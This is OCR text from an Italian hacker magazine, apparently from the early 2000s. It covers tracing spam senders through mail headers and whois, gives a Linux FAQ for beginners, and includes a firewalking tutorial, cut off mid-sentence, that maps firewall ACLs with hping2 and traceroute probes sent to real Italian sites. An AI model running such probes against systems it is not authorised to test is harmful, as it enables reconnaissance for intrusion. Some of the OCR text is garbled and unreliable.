mensa mole di messaggi. 

Il dibattito sull 1 "etica" dello spam è ac- 
ceso, e anche se può sembrare incredibi- 
le, sono moltissimi gli spammer che vi 
partecipano asserendo che la loro attività 
si fonda sul principio di libertà di parola. 

Non vogliamo entrare nel merito di 
queste discussioni: troppo sarebbe lo 
spazio richiesto e poche le conclusioni 
pratiche. 

Rimane da pensare, ad esempio, a 
tutte quelle persone che ricevono quoti- 
dianamente email a chiaro contenuto 
pornografico delle quali non hanno mai 
fatto richiesta, e che magari si trovano 
a dover fronteggiare situazioni 
quantomeno imbarazzanti nel mo- 
mento in cui si trovano a scaricare la po- 
sta sul lavoro... 



» Ma chi c***o le manda? 

Una delle domande che immediata- 
mente ci si pone in merito allo spam è : 
"ma da dove arrivano tutte queste email? 
Chi le manda?" 

Si può trattare di aziende come di pri- 
vati: chiunque abbia pochi scrupoli e in- 
teresse a raggiunere con i suoi messaggi 
il maggior quantitativo di utenti possibile 
è un potenziale spammer. 

Lo spam si verifica principalmente via 
email, ma è da considerarsi tale anche 
tutta quella mole di messaggi non richie- 
sti proveniente da chat, istant messanger, 
newsgroups e mailing list varie: bot che 
entrano in un canale IRC particolarmente 
popolato pubblicizzando qualche sito 
porno, messaggini ICQ che ci chiedono 
di raggiungere un uri di video chat, web- 
master che postano il link al proprio sito 
in cross post a centinaia di ng diversi. 

Tuttavia, lo spam che maggiormente 
si avvicina a quello che in pratica rap- 
presenta un vero e proprio furto di 
servizi è il classico invio di email 
non richieste. Il problema è ormai 
chiaro: adesso occorre difendersi. 

La prima regola è quella che più 
spesso ricorre in rete: conoscere il pro- 
prio nemico. In che modo gli spam- 
mers sono arrivati in possesso del 
nostro indirizzo email? Che cosa vo- 
gliono da noi? 



Quello che con maggiore frequenza 
uno spammer cerca è un indirizzo email 
valido: ovvero un indirizzo che qualcuno 
utilizzi il più sovente possibile per inviare 
e ricevere posta. Questo è uno dei punti 
cruciali: lo spammer ha interesse unica- 
mente a che i propri messaggi vengano 
letti, non importa tanto da chi. 

E dunque la più frequente reazione di 
fronte allo spam è anche quella più sba- 
gliata: mai rispondere ad un mes- 
saggio di spam! 

Fare un reply a messaggi di spam 
equivale a confermare allo spammer che 
ci bombarda che il nostro è un indirizzo 
email attivo, e che i suoi maledetti mes- 
saggi vengono letti da qualcuno in carne 
e ossa. Esistono in rete persone senza 
scrupoli che collezionano liste di migliaia 
e migliaia di indirizzi email per poi riven- 
derli allo spammer di turno, e un indi- 
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rizzo confermato come "attivo" (dal 
quale abbiamo magari risposto a 
qualche messaggio di spam) ha un 
prezzo decisamente più alto che 
uno non verificato. 

Senza contare, poi, che qualsiasi in- 
sulto o minaccia risulterebbe perfetta- 
mente inutile: lo spammer è il primo a 
rendersi conto di essere molesto, e di cer- 
to non verrà toccato dai nostri lamenti. 

E 1 dunque poco sensato anche 
seguire le istruzioni che il più delle 
volte accompagnano i messaggi di 
spam: rispondere alla email di tur- 
no inserendo "CANCEL" nel soggetto o 
altro non servirà a cancellare il nostro in- 
dirizzo dalle liste degli spammers: quello 
che vogliono è solo la certezza di inviare 
messaggi a qualcuno che li legge, e tutte 
le finte istruzioni che vengono poste in 
fondo ai messaggi per "cancellarsi da 
questa lista" servono solo a compilare al- 
tre liste di indirizzi email "certificati" che 
gireranno sempre più massicciamente tra 
le mani degli spammers. 



andò che permette di 
re ai referenti di un se 
nome di dominio. 



La prima regola da seguire, 
quindi, è quella del silenzio e del- 
la pazienza. Perdere il controllo non 
serve a nulla, tanto più che nella stra- 
grande maggioranza dei casi l'indirizzo 
email dello spammer risultante dagli 
header delle email non risulterà valido, 
o sarà di qualcuno che non c'entra nul- 
la con lo spam in questione. 

Quello che però è importante tenere 
a mente è sempre il fine ultimo di un 
messaggio di spam: nel 99% dei casi 
spillare soldi a qualcuno. 

E dunque, leggendo i messaggi, 
potremo in ogni caso ottenere infor- 
mazioni su chi ci sta contattando e 
perché. Quello di cui abbiamo biso- 
gno per difenderci è un referente. 

A questo punto in molti si staranno 
chiedendo se non valga la pena di 
impostare dei semplici filtri sulla 
propria casella di posta: questo tipo 
di soluzione risulta efficace solo in parte, 
anche in considerazione del fatto che in 
ogni caso viene generato del traffico (che 
sia determinato dal download dei mes- 
saggi da parte del nostro client di posta o 
che i filtri vengano applicati dal server); il 
punto rimane quello di eliminare questo 
tipo di attività alla radice, dissuadendo 
l'invio non autorizzato di messaggi trami- 
te un dialogo costante non con gli spam- 
mers, quanto con chi provvede a loro de- 
terminati servizi, in primo luogo quello di 
email. 

Le operazioni da compiere 
quando riceviamo spam sono dun- 
que il ricercare un referente (che co- 
munque sarà indicato nel corpo del mes- 
saggio, sia esso una azienda, un sito o 
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una persona fisica); occorre in seguito 
identificare il provider a cui si ap- 
poggia lo spammer in questione: 

ciò può essere fatto andando a spulciare 
tra gli header della email, dai quali otter- 
remo l'IP dello spammer ma, cosa più im- 
portante, anche i dati di chi gli fornisce la 
connettività. 

E proprio a questo dovremo fare rife- 
rimento, andando a verificare da dove ar- 
riva lo spam e chi lo veicola. 

Un qualsiasi sito dal quale fare 
whois ci fornirà tutte le informazio- 
ni di cui abbiamo bisogno. 

Una volta ottenuti gli estremi del pro- 
vider utilizzato dallo spammer per inoltra- 
re la sua sgradita corrispondenza, non 
dovremo fare altro che segnalare al 
provider stesso la presenza dello 
spammer. Molti provider, normalmente, 
hanno indirizzi appositi a cui inoltrare se- 
gnalazioni di spam (del tipo 
abuse@provider.it) e in genere, sia per 
una questione di traffico generato che di 
immagine, i grandi provider tendono a 
reprimere il fenomeno. Libero.it è piutto- 
sto puntuale a riguardo, mentre tin.it si è 
mossa solo di recente. 

La prassi da adottare è in dunque 
quella di protestare "alla radice", evitando 
il contatto diretto con gli spammer, che 
non vedono l'ora di poter compilare liste 
chilometriche di indirizzi email attivi. 
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COME RINTRACCIARE 
IL MITTENTE VERO 

Esaminando le intestazioni di un 
messaggio, si può individuare il 
server da cui è effettivamente 
partito. Qualsiasi client di posta 
permette di visualizzare 1' header; 
per esempio, con con Kmail bisogna 
scegliere la voce "Mostra sorgente" 
dal menù "Messaggio". La prima 
parte delle intestazioni presenta 
tutto il percorso che il messaggio 
ha compiuto prima di arrivare al 
nostro client : 

Return-Path: <uxi@aol . com> 

Indica l'indirizzo email del 
mittente (ma potrebbe essere stato 
contraffatto) e in ogni caso, come 
già detto, non è consigliabile 
rispondere a questo indirizzo. 
Potremmo indicare allo spammer che 
il nostro indirizzo email è attivo. 
Tutta la sfilza di "Received", 
invece, indica da quali server di 
posta è transitato il messaggio: 

Received: from 55.92.178.196 
([55.92.178.196]) by smtp- 
serverl.cfl.rr.com with QMQP; Jun, 
15 2002 4:34:14 PM -0300 

Questa è l'ultima riga della serie 
di campi Received, e mostra il 
primo passaggio dell'email. Facendo 
un traceroute o un whois proprio su 
55.92.178.196 (tramite un database 
online come www.ripe.net) , potremo 
ottenere informazioni importanti sul 
server che lo spammer ha utilizzato 



per inoltrare il proprio 

messaggio . 

Una volta acquisita 

questa informazione, 

potremo rivolgerci 

all'apposito servizio di 

abuse che si occuperà di impedire 

allo spammer di inviare altri 

messaggi . 
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Se fosse impossibile risalire al 
server utilizzato dallo spammer, o 
se questo non prendesse in 
considerazione le nostre lamentele, 
bisognerà cercare un referente nel 
corpo stesso delle email, 
utilizzando il dominio del sito 
pubblicizzato. Da questo dominio, 
si può risalire al provider che ne 
effettua l'hosting attraverso il 
database di Network Solutions 
(www. net sol . com/cgi-bin/whois/ whois) 
per i domini . com, .net e .org, e 
in quello del Nic 

(www . nic . it /RA/database/viaWhois . html ) 
per i domini italiani.it. 
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// database di Ripe.net 
è sempre un ottimo 
strumento per ricavare 
informazioni su un sito, 
a partire dal suo nome 
di dominio. 
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TUTTO QUELLO CHE AVRESTE VOLUTO SAPERE SU LINUX. 



Linux in pillole 

Dopa auer presentata le più famose e rappresentatine distribuzioni di Linun, 
ci accingiamo ad un piccolo elenco di domande frequenti che i neofiti spesso 
si pongono: le basi tecniche, la filosofia che c'è dietro allopen source, il mercato. 
Iniziamo subito. 




Che cavolo è LINUX? 



S Linux è un sistema operativo 
per personal computer (386- 
Pentium PRO, Digital Alpha, PowerPC, 
Sun SPARC, Apple Macintosh, Atari ST/TT, 
Amiga, MIPS) sviluppato come implemen- 
tazione gratuita di UNIX. Le sue prime re- 
lase vennero realizzate da Linus Torvalds 
presso l'Università 1 di Helsinki in Finlan- 
dia. In seguito, grazie alla sua struttura 
open source, moltissimi sviluppatori e 
programmatori sparsi per il mondo con- 
tribuirono in modo determinante al pro- 
gresso di questo sistema operativo. 
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Perchè tutti dicono che è me- 
glio di Windows? 



Linux nasce e si sviluppa negli 
anni grazie al contributo di moltissimi 

sviluppatori, che continuano a miglio- 
rarne le caratteristiche e a renderlo sem- 



pre più affidabile e sicuro nel corso del 
tempo. La filosofia che sta dietro ad un 
progetto open source è per sua natura vo- 
tata al continuo perfezionamento del pro- 
dotto, che proprio per il fatto di mantene- 
re il proprio codice visibile e modificabile 
da tutti è costantemente soggetto a mi- 
gliorie di ogni sorta. Uno sviluppo di que- 
sto tipo è concettualmente superiore (al- 
meno da un punto di vista tecnico) al clas- 
sico sistema commerciale che prevede 
una fase di ricerca, una fase di sviluppo e 
una fase di debugging che il più delle vol- 
te non fa altro che danneggiare l'utente fi- 
nale, sia esso un privato o una azienda. 

Le doti di sicurezza, stabilità e robu- 
stezza di Linux sono direttamente eredi- 
tate dalla compattezza di UNIX, e la sua 
proverbiale versatilità, soprattutto nei 
confronti di sistemi multiutente come 
quelli presenti in rete, viene mantenuta e 
resa sempre più efficace. 
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Ma che cos'è di preciso que- 
sto open source? 



Open source non vuole dire 
semplicemente avere il codice sorgente di 
un programma a propria disposizione. 
Esistono differenti criteri che un prodotto 
open source (e infatti di prodotto si tratta, 
in quanto non solo i programmi per com- 
puter possono essere open source) deve 
soddisfare: prendendo come esempio il 
software, esso deve essere liberamente 
distribuito, senza la pretesa di paga- 
menti vari o limitazioni d'uso; deve, co- 
me già sappiamo, essere possibile all'u- 
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tente finale accedere al codice sorgente 

del software in questione, e deve inoltre 
essere possibile attuare modifiche a 
suddetto codice. Inoltre esistono molti al- 
tri criteri più burocratici: deve per esempio 
essere preservata l'integrità del codice 
sorgente dell'autore del programma in 
questione, e molteplici altre clausole ri- 
guardano le politiche attuate per licenzia- 
re i vari programmi. Un buon sunto della 
questione a 

http://www.apogeonline.com/open- 
press/op_definition.html 
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Passando a cose più prati- 
che: come faccio a mettere 
su questo Linux? 



La pratica più semplice e più comune 
per un neofita che si avvicina per la prima 
volta al mondo Linux è senza dubbio 
quella di cercarne una distribuzione al- 
legata a qualche giornale in edicola: 
molte distribuzioni vengono infatti distri- 
buite praticamente gratis in modo da au- 
mentarne il più possibile la diffusione e 
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avere poi dei rientri nel momento in cui il 
cliente, soddisfatto del sistema operativo, 
chieda per esempio assistenza su deter- 
minati prodotti o pacchetti presenti nella 
distribuzione in esame. 

Se si dispone di una connessione a in- 
ternet sufficientemente veloce, moltissi- 
me tra le più famose distribuzioni Li- 
nux si possono downloadare gratuita- 
mente. Una volta in possesso della no- 
stra distribuzione (sempre prendendo in 
esame l'esempio del neofita consiglierem- 
mo una distro quale Mandrake o RedHat) 
dovremo procedere all'installazione, che 
varia da distribuzione a distribuzione. In 
linea di massima la tendenza è quella di 
facilitare il più possibile il lavoro dell'uten- 
te in fase di installazione: una volta crea- 
ta una partizione vuota o comunque 
adatta ad ospitare Linux (operazione che 
in alcune distro avviene in fase di installa- 
zione) non dovremo fare altro che inseri- 
re il primo CD ROM nel lettore e bootare 
la macchina. In breve avremo installato 
una Linux Box completa di tutto quello che 
ci serve per lavorare. 



H 



Ma allora lo posso installare 
senza cancellare la mia par- 
tizione Windows? 



Sì, basta avere l'accortezza di creare 
una partizione vuota o comunque adatta 
a Linux. Questo può essere fatto utilizzan- 
do i tools messi a disposizione da alcune 
distro in fase di installazione o mediante 
l'uso di programmi quali Partition Magic 
o Fips, che spesso è incluso nei CD 
ROM delle distribuzioni più famose, e 
che permette in pochi passi di configurare 
una partizione per il nuovo sistema ope- 
rativo. Una volta installato Linux, questi 
provvedere a configurare una cosa chia- 
mata boot-loader: un software che al- 




l'avvio della macchina ci consentirà di 
scegliere con quale sistema operativo 
lavorare, in base alle nostre esigenze. 



R 



Ma i miei programmi per 
Windows funzionano sotto 
Linux? 




Di default no: i programmi che comu- 
nemente vengono usati sotto Windows 
non possono funzionare sotto Linux, in 
quanto stiamo parlando di un sistema 
operativo profondamente differente nella 
sua struttura da Windows. 

Esistono però diversi emulatori 
mediante i quali si può riuscire a far 
funzionare alcuni programmi Win- 
dows anche sotto Linux. C'è da dire che 
il parco software disponibile per Linux è 
immenso che spesso potremo trovare dei 
cloni perfetti di famosi programmi Win- 
dows... In alcuni casi (nemmeno troppo di 
rado) la qualità e la stabilità dei cloni su- 
pera quelle del programma originale. 



Ho sentito dire che i modem 
non funzionano con Linux. 
E' vero? 



In parte sì. In verità sono solo alcuni 
modem ad avere problemi con Linux: i fa- 
migerati winmodem. Moltissimi modem 
interni sono winmodem: con un winmo- 
dem alcuni componenti della circuitazio- 
ne del dispositivo di comunicazione ven- 
gono emulati da Windows. Questo viene 
fatto per ridurre il costo del modem, ma 
in questo modo molti modem interni sono 
compatibili esclusivamente con Win- 
dows&Co. La cosa più semplice è pro- 
curarsi un modem esterno, che si può 
trovare per poche decine di euro. Si 
può comunque cercare di far funzionare 
ugualmente il proprio modem interno sot- 
to Linux. Un ottimo sito di riferimento è 
http://www.linmodems.org 

HHo installato Linux e confi- 
gurato il mio modem. Ho 
scaricato un programma e 
non c'è verso di installarlo. 
Che cosa faccio, mi ammazzo? 

No! In linea di massima, installare un 
qualsiasi programma sotto Linux non è 




così semplice come farlo da 
Windows&Co. Non che la 
faccenda presenti particola- 
ri insormontabili difficoltà, 
ma la procedura può essere profonda- 
mente differente. Comune all'ambiente Li- 
nux è l'utilizzo di pacchetti compressi (tipo 
tar.gz) che in pratica sono la controparte 
Linux dei classici .zip. Una volta scompat- 
tati i pacchetti (con qualsiasi ditribuzione 
che implementi un desktop grafico l'ope- 
razione è quantomai simile a quella effet- 
tuata per scompattare i file .zip) ci trovere- 
mo di fronte però a una serie di file conte- 
nenti i codici sorgenti del programma da 
installare. La prassi è quella di agire da 
linea di comando: lanciare uno script 
che si occupa di verificare se il proprio 
computer ha tutti i requisiti adatti per 
installare il software, e configurarlo di 
conseguenza: ciò si fa nel 99% dei casi 
con un bel ./configure. Fatto questo (è la 
fase in cui si possono incontrare i maggio- 
ri problemi) avremo creato un makefile, 
che verrà usato da make per compilare ef- 
fettivamente il programma: scriviamo 
./make per avviare l'operazione. Alla fine, 
un ./make instali installerà il programma 
e lo renderà disponibile agli utenti. La pro- 
cedura può essere molto complessa, e va- 
riare da programma a programma. Alcu- 
ne distribuzioni hanno da tempo in- 
trodotto un sistema di pacchettizzazio- 
ne del software che rende molto più 
semplice l'installazione dei pacchetti, 
come ad esempio la classica forma .rpm 
adottata da Red Hat e in seguito da Man- 
drake. Se il programma che cerchiamo è 
disponibile in questi formati per la nostra 
distribuzione, e non abbiamo tempo o vo- 
glia di perdere una serata a cercare di ri- 
solvere qualche dipendenza, sarà tutto 
molto più semplice scaricando il pacchet- 
to adatto. Questo non vuol dire che affi- 
darsi ciecamente a pacchettizzazioni pre- 
compilate dei programmi sia la scelta mi- 
gliore: come al solito il consiglio è quello 
di curiosare, smanettare e leggere il più 
possibile. La documentazione è enorme, 
usiamola! m 
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Pacchettizzazioni: sono le varie 
versioni di Linux distribuite e più o 
meno gratuite. "Distro" per gli 
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COME TROVARE UN " PUNTO DI ATTACCO" IN UN FIREWALL 



ED 




Per essere ueri hacker bisogna anche sudare un po'. Ecco una guida per indiuiduare e 
superare le "falle" in router e firewall. Uediamo chi di uoi riesce a capirci qualcosa. 
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TCP/IP Protocol 

Il presente articolo dà per 
scontato che il lettore sia in pos- 
_ sesso di buone conoscenze ine- 
renti ai protocolli di rete e al loro funzio- 
namento, per tanto tale argomento non 
verrà affrontato durante la trattazione di 
questo testo. 



2 



Firewalking 

Il termine firewalking è usato 
per indicare l'insieme di tecniche 
che permettono di identificare 
un router/firewall e le rispettive AC L(Access 
Control List, cioè l'insieme di regole adot- 
tate dai dispositivi a filtro di pacchetto per 



stabilire se il traffico su una data interfac- 
cia sia lecito o meno). Tramite il firewal- 
king un attacker è in grado di rilevare po- 
tenziali falle nella sicurezza del firewall al 
fine di ottenere un accesso non autorizza- 
to alla rete interna. 

Lo scopo di questo articolo è descrivere 
nel dettaglio queste tecniche al fine di con- 
sentire l'applicazione delle stesse ad un am- 
ministratore che voglia testare con mano 
l'efficacia dei propri sistemi di protezione. 

RFC 793, Transmission 
Control Protocol 

Gran parte delle tecniche che 
introdurrò nel corso della tratta- 
zione di questo articolo trovano 
le loro basi portanti nelle specifiche dei pro- 
tocolli di rete e precisamente nel TCP 

3.1 Closed State (DaMRFC 793) 

Nella RFC 793 si legge: 
"1. Se la connessione non esiste (CLO- 
SED), viene inviato un segnale reset in ri- 
sposta a qualsiasi segmento in ingresso, a 
meno che non avvenga un altro reset. In 
particolare, vengono respinti in questo 
modo i SYN indirizzati a una connessione 
inesistente. Se il segmento in ingresso ha 
un campo ACK, il reset prende il suo nu- 
mero di sequenza dal campo ACK del 
segmento, altrimenti il campo ACK ha il 
numero di sequenza uguale a zero e il 
campo ACK viene impostato sulla somma 
dei numeri di sequenza e sulla lunghezza 
del segmento in ingresso. La connessione 
rimane nello stato CLOSED". 

A quanto pare possiamo dedurre che se 
inviamo un pacchetto ad un certo host su 
una porta che risulta chiusa esso ci rispon- 
derà con un pacchetto con flag RST attivo, 
a meno che il pacchetto che gli abbiamo 
mandato non contenesse a sua volta il solo 
flag RST impostato a 1 . 

Per fare un esempio pratico di quanto 
abbiamo appena detto, useremo il tool 
Hping2 di Antirez, che permette di forgiare 
pacchetti TCP adatti alle nostre esigenze: 



# hping2 -p 1 -S localhost 



Firewalking: Indica l'insieme 
di tecniche che permettono 
di identificare un router/firewall 
e le rispettive ACL (Access 
Control List), ovvero l'insieme 
di regole adottate dai dispositivi 
a filtro di pacchetto per stabilire 
se il traffico su una data 
interfaccia sia lecito o meno. 



HPING localhost (lo 127.0.0.1): S set, 
40 headers + data bytes len=40 
ip=127. 0.0.1 flags=RA seo^O ttl=255 
id=679 win=0 rtt=0.3 ms len=40 
ip=127. 0.0.1 flags=RA seo^l ttl=255 
id=680 win=0 rtt=0.2 ms len=40 
ip=127. 0.0.1 flags=RA seo=2 ttl=255 
id=681 win=0 rtt=0.2 ms 

localhost hping statistic 

3 packets tramitted, 3 packets recei- 
ved, 0% packet loss round-trip 
min/avg/max = 0.2/0.3/0.3 ms 



Ho inoltrato un pacchetto con flag SYN 
attivo alla porta 1 di localhost che si trova 
nello stato CLOSE. In risposta ho ottenuto 
un pacchetto RST (flags=RA, sta per 
RST/ACK) come pronosticato. 

Ora inviamo allo stesso host e alla stes- 
sa porta un pacchetto con flag RST attivo, 
come da specifiche RFC l'host non rispon- 
derà con alcun pacchetto: 



# hping2 -p 1 -R localhost 

HPING localhost (lo 127.0.0.1): R 

set, 40 headers + data bytes 

localhost hping statistic 

3 packets tramitted, packets re- 
ceived, 100% packet loss round-trip 
min/avg/max = 0.0/0.0/0.0 ms 



3.2 Listen State 

Bene, passiamo al secondo punto, che 
prende ispirazione dall'RFC del protocollo 
TCf? l'RFC 793, che recita: 

"2. Se la connessione è in un qualsia- 
si stato non sincronizzato (LISTEN, SYN- 
SENT, SYN-RECEIVED), e il segmento in 
ingresso si accorda per qualcosa che non 
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ancora stato inviato (il segmento reca 
un ACK inaccettabile), o se un segmento 
in ingresso ha un livello di sicurezza o 
compartimento che non corrisponde esat- 
tamente al livello e al compartimento ri- 
chiesto per la connessione, viene inviato 
un segnale di reset [...]. 

Se il segmento in ingresso ha un cam- 
po ACK, il reset prende il suo numero di 
sequenza dal campo ACK del segmento, 



zero e il campo ACK viene impostato sulla 
somma del numero di sequenza e della 
lunghezza del segmento in ingresso. 

La connessione comunque rimane 
nello stesso stato". 

Da queste righe traspare che se invias- 
simo un pacchetto con flag ACK attivo su 
una porta che si trova nello stato LISTEN 
avremo in risposta un pacchetto con flag 
RST pari a 1 (attivo). 

Per esempio: 



# hping2 -p 80 -A localhost 
HPING localhost (lo 127.0.0.1): A set, 
40 headers + data bytes len=40 
ip=127. 0.0.1 flags=R seq=0 ttl=255 
id=710 win=0 rtt=0.3 ms len=40 
ip=127. 0.0.1 flags=R seq=l ttl=255 
id=711 win=0 rtt=0.2 ms len=40 
ip=127. 0.0.1 flags=R seq=2 ttl=255 
id=712 win=0 rtt=0.2 ms 

localhost hping statistic 

3 packets tramitted, 3 packets recei- 
ved, 0% packet loss round-trip 
min/avg/max = 0.2/0.3/0.3 ms 



L'inoltro del pacchetto con flag ACK 
impostato a 1 verso la porta 80 (LISTEN) 
del sistema localhost ha causato, come 
risposta da parte dello stesso, un pac- 
chetto RST (flags = R) come da specifiche 
del protocollo. 

Procedendo in maniera analoga mi è 
stato possibile isolare la seguente tabel- 
la che useremo da adesso in poi come 
riscontro dei nostri probe: 



Listen 


NULL 


None 


Listen 


FIN 


None 


Listen 


RST 


None 


Listen 


ACK 


RST 


Listen 


SYN 


SYN/ACK 


Closed 


RST 


None 


Closed 


NULL 


RST/ACK 


Closed 


ACK 


RST 


Closed 


SYN 


RST/ACK 


Closed 


FIN 


RST/ACK 



Auditing delle ACL 

4.1 Semplici deduzioni sui flag 

La tecnica si basa su sempli- 
ci deduzioni pertanto è bene procedere con 
degli esempi, tenendo bene a mente la ta- 
bella riportata qui sopra: 



# hping2 -p 80 -S www.yahoo.it 
HPING www.yahoo.it (ethO 217.12.3.11): 
S set, 40 headers + data bytes 
len=46 ip=217.12.3.11 flags=SA DF 
seq=0 ttl=51 id=19912 win=65535 [...] 
len=46 ip=217.12.3.11 flags=SA DF 
seq=l ttl=51 id=56715 win=16384 [...] 
len=46 ip=217.12.3.11 flags=SA DF 
seq=2 ttl=51 id=41115 win=65535 [...] 



Il web server è in ascolto sulla porta 80 e 
risponde prontamente a una richiesta di 
connessione (flag SYN = 1) con un pac- 
chetto SYN/ACK, tutto è andato come 
previsto. 

Ora proviamo a inviare un pacchetto 
con il solo flag ACK attivo, quello che ci 
aspettiamo, attenendoci alla solita tabel- 
la, è di ricevere un RST: 



# hping2 -p 80 -A www.yahoo.it 
HPINGwww.yahoo.it (ethO 217.12.3.11): 
A set, 40 headers + data bytes 

www.yahoo.it h ping statistic 

3 packets tramitted, packets re- 
ceived, 100% packet loss round-trip 
min/avg/max = 0.0/0.0/0.0 ms 



Diversamente da quanto atteso non 
abbiamo ricevuto alcun pacchetto in ri- 
sposta, quasi come se il nostro ACK fos- 
se stato droppato(2). Cosa è andato 
storto? 

L'ipotesi più plausibile è che vi sia un 
firewall a filtro di pacchetto che blocchi 
qualsiasi pacchetto non sia inteso a sta- 
bilire una connessione con la porta in 
questione. 

Penso che abbiate capito come fun- 
ziona. ..vero? Il segreto consiste nel rile- 
vare una contraddizione tra il reply che 
normalmente ci si aspetta dallo stack 
TCP e il valore restituito dal probe. 

4.2 ICMP message 

La peculiarità di alcuni messaggi di er- 
rore ICMP può fornire informazioni molto 
preziose riguardo alle caratteristiche stesse 
della rete che ha generato il messaggio. 
Una tecnica molto comune utilizzata per 
raccogliere informazioni si basa proprio 
sulla creazione di pacchetti appositamente 



Droppato: dall'inglese to drop, 



ifica letteralmente lasciare 
ere, si usa per indicare una 
richiesta che viene ignorata. 



studiati per generare un messaggio di erro- 
re ICMP da parte dell'host destinatario del 
pacchetto. Procedendo nell'analisi delle ACL 
ci capiterà di imbatterci in un ICMP di tipo 
3 codice 1 3 che segnala la presenza di un 
filtro imposto dall' amministratore. 

Ogni qual volta otterremo in risposta ad 
un dato probe un ICMP di quel tipo non so- 
lo saremo al corrente della presenza di un 
firewall ma ne conosceremo l'indirizzo Ir? il 
che rappresenta un gran vantaggio al fine 
di determinare il diretto responsabile del fil- 
traggio del traffico illecito. Hping2 rileva e 
segnala la presenza di un filtro amministra- 
tivo in questo modo: 



# hping2 -p 79 -S www.libero.it 
HPINGwww.libero.it (ethO 195.210.91.83): 

5 set, 40 headers + data 
ICMP Packet filtered from 
ip=192.106.7.230 name=UNKN0WN 
ICMP Packet filtered from 
ip=192.106.7.230 name=UNKN0WN 
ICMP Packet filtered from 
ip=192.106.7.230 name=UNKN0WN 

www.libero.it hping statistic 

6 packets tramitted, packets re- 
ceived, 100% packet loss round-trip 
min/avg/max = 0.0/0.0/0.0 ms 



l'IP riportato non è necessariamente 
quello del sistema destinatario bensì del si- 
stema che ha generato la risposta ICMP ov- 
vero il firewall :) 

Vi sono molti modi di procedere al fine 
di causare l'emissione di un messaggio 
ICMP da parte di un sistema remoto, la 
mancata emissione dello stesso indica con 
tutta probabilità la presenza di un dispositi- 
vo filtrante. 
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A tale scopo è importante consultare l'e- 
lenco dei tipi ICMf? l'ultimo aggiornamento 



www.iana.org/assignments/icmp-pa- 
rameters 



oute 

, w.v.route è un tool che permette di ri- 
cavare i router/gateway interessati all'instra- 
da mento dei nostri pacchetti verso un siste- 
ma destinatario, fornisce in output i vari hop 
che compie il pacchetto per raggiungere il 
sistema desiderato. 

Ad ogni hop il campo TTL (Time To Live) 
del pacchetto viene decrementato di un'uni- 
tà, il raggiungimento del valore da parte 
di quest'ultimo causa un errore ICMP da 
parte dell'instradatore che ha processato il 
pacchetto.Traceroute invia un primo pac- 
chetto verso l'host destinazione con TTL pa- 
ri a 1 (che scadrà al primo salto causando 
un errore ICMP da parte dell'instradatore 
che ha processato il pacchetto), successiva- 
mente invierà al sistema destinatario altri 
pacchetti incrementando di volta in volta il 
campo TTL di un'unità fino all'effettivo rag- 
giungimento del sistema target. Questo 
processo fornisce gli IP address di tutti i rou- 
ter interessati all'instradamento compreso 
l'eventuale dispositivo con funzioni di pocket 
filtering. Qui di seguito sono riportati alcuni 
esempi che ne illustrano il funzionamento, 
gli IP address dei primi hop sono stati volu- 
tamente oscurati: 



# traceroute www.arianna.it traceroute 
to arianna.iol.it (195.210.91.187), 30 
hops max, 40 byte 

1 192.168.1.1 (192.168.1.1) 1.186 
ms 2.035 ms 1.094 ms 

2 XXX . X . XXX . xxx (xxx.x.xxx.xxx) 
40.615 ms 40.612 ms 42.971 ms 

3 XXX. X. xxx. xx (xxx.x.xxx.xx) 
42.234 ms 42.148 ms 39.653 ms 

4 xxx.x.xxx.xxx (xxx.x.xxx.xxx) 
41.942 ms 43.718 ms 45.596 ms 

5 gr-mi-b-vl2.iunet.it 
(192.106.1.172) 43.810 ms 44.086 ms 
44.008 ms 

6 192.106.7.238 (192.106.7.238) 
42.775 ms 43.245 ms 47.147 ms 



L'output del traceroute termina in ma- 
niera del tutto anomala al settimo hop, in- 



HOP: salto tra un nodo e l'altro. 
Ogni router attraversato 
rappresenta un salto. 



dicando la presenza di un dispositivo con 
funzionalità di filtro di pacchetto, la nostra 
richiesta è stato droppata e il campo TTL 
non è stato decrementato con conse- 
guente mancato ricevimento dell'ICMP error 
atteso. Come impostazione predefinita, il 
programma Traceroute utilizza pacchetti 
UDP per i propri probe, con tutta probabili- 
tà questi sono bloccati dalle rules del router 
che si trova in coincidenza del settimo salto. 
Possiamo utilizzare l'opzione -I per for- 
zare il programma ad utilizzare il protocol- 
lo ICMP al fine di aggirare il filtro: 



# traceroute -I www.arianna.it 
traceroute to arianna.iol.it 
(195.210.91.187), 30 hops max, 40 byte 

1 192.168.1.1 (192.168.1.1) 1.162 ms 
1.181 ms 1.091 ms 

2 xxx.x.xxx.xxx (xxx.x.xxx.xxx) 41.748 
ms 41.655 ms 37.773 ms 

3 xxx.x.xxx.xx (xxx.x.xxx.xx) 40.642 
ms 43.297 ms 41.176 ms 

4 xxx.x.xxx.xxx (xxx.x.xxx.xxx) 43.657 
ms 42.232 ms 45.558 ms 

5 gr-mi-b-vl2.iunet.it (192.106.1.172) 
41.181 ms 43.095 ms 47.625 ms 

6 192.106.7.238 (192.106.7.238) 44.536 
ms 43.700 ms 44.011 ms 

7 arianna.iol.it (195.210.91.187) 
45.323 ms 44.111 ms 42.984 ms 



Bene, ora il trace è andato a buon fine ed ha 
percorso tutti i salti che ci separano dal l'host 
destinatario, ora siamo a conoscenza dell'IP 
del firewall e siamo in grado di raccoglire ul- 
teriori informazione riguardo alle sue ACL. 

Vediamo ora un altro esempio analogo: 



# traceroute -I www.xoom.it 

traceroute to xoom.it (212.66.231.5), 30 

hops max, 40 byte packets 

1 192.168.1.1 (192.168.1.1) 1.166 ms 
1.165 ms 1.097 ms 

2 xxx.x.xxx.xxx (xxx.x.xxx.xxx) 37.347 ms 
39.567 ms 40.109 ms 

3 xxx.x.xxx.xx (xxx.x.xxx.xx) 38.024 ms 
40.095 ms 39.595 ms 

4 xxx.x.xxx.xx (xxx.x.xxx.xx) 46.864 ms 

5 gw-wind-mi 6-pos-inf ostrada . wind . it 
(212.245.250.49) 44.291 ms [...] 

6 c-mi2-f e2a.wind.it (212.245.36.130) 
42.704 ms 44.094 ms 45.854 ms 

7 212.245.53.30 (212.245.53.30) 55.765 ms 
57.864 ms 55.785 ms 



In questo caso il router che si trova al- 
l'ottavo hop non solo blocca le richieste 



UDP ma anche quelle ICMFJ dovremo ricor- 
rere dunque ad una tecnica leggermente 
differente per aggirare anche questa restri- 
zione. 

Come avrete visto nell'esempio prece- 
dente il traceroute non riesce a fare il suo 
dovere, in quanto i pacchetti da esso utiliz- 
zati non riescono a passare il filtro e di con- 
seguenza non riescono a scadere generan- 
do l'ICMP che rivelerebbe l'identità del fire- 
wall. Proviamo ad utilizzare Hping2 per ar- 
rivare la dove il traceroute non arriva, il no- 
